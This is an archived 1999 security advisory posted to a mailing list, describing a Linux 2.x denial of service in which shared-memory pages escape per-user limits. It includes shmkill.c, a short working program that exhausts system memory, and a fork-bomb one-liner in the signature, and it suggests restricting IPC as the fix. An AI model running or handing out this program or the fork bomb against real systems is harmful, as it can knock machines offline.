linux.2.x.mmap.DoS.txt

`Date: Sun, 7 Mar 1999 01:41:25 +0100  
From: Michal Zalewski <[email protected]>  
  
Linux 2.x mmap vunerability  
  
Linux 2.0.36 has the similiar problem with copy-on-write pages allocated  
with mmap - as these pages are not accounted within per-user limits.  
Fortunately, it's less harmfull than (5), because memory will be freed as  
soon as process owning it will be killed. Exploit will be NOT posted - see  
below.  
  
-- shmkill.c --  
extern int errno;int i,d=1;char*x;main(){while(1){x=shmat(shmget(0,10000000/  
d,511),0,0);if(errno){d*=10;continue;}for(i=0;i<10000000/d;i++)if(*(x+i));}}  
-- eof --  
  
Memory won't be freed even if luser's process will be killed, you have to  
use ipcrm, but there could be not enough memory to run anything :-(  
  
Under early 2.2.x, you have to run this program several times, to ensure  
pages are detached (in this state, they are onwerless ;-).  
  
The simpliest solution is to restrict for lusers IPC at all. Only a few  
programs uses IPC - probably only dosemu and ShoutCast ;>  
  
_______________________________________________________________________  
Michal Zalewski [[email protected]] [link / marchew] [dione.ids.pl SYSADM]  
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:  
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]  
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]  
  
`